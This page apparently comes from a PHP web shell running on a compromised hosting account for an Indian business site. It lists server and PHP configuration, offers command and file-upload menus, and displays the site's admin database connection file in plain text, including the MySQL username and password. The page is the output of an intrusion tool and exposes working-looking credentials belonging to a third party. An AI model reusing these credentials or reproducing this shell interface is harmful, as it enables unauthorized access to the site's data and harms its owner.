|
Server IP : 145.79.210.100 / Your IP : 216.73.216.101 Web Server : LiteSpeed System : Linux in-mum-web1954.main-hosting.eu 5.14.0-570.26.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jul 16 09:12:04 EDT 2025 x86_64 User : u474798400 ( 474798400) PHP Version : 7.4.33 Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF Directory (0755) : /home/u474798400/domains/excentia.in/public_html/admin/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php error_reporting(0);
//echo 'gdgdggg';
?>
<?php
// define(DB_HOST,"localhost");
// define(DB_USER,"root");
// define(DB_PASSWORD,"");
// define(DB_NAME,"salient");
// //connection
// $conn=mysqli_connect(DB_HOST,DB_USER,DB_PASSWORD,DB_NAME);
// if(!$conn)
// {
// echo "<strong>Connection has not established with the server</strong>";
// }
$conn = new mysqli("localhost","u474798400_excenuser","8~CbTZk*Ks2","u474798400_excentiat");
// Check connection
if ($conn -> connect_errno) {
echo "Failed to connect to MySQL: " . $conn -> connect_error;
exit();
}
?>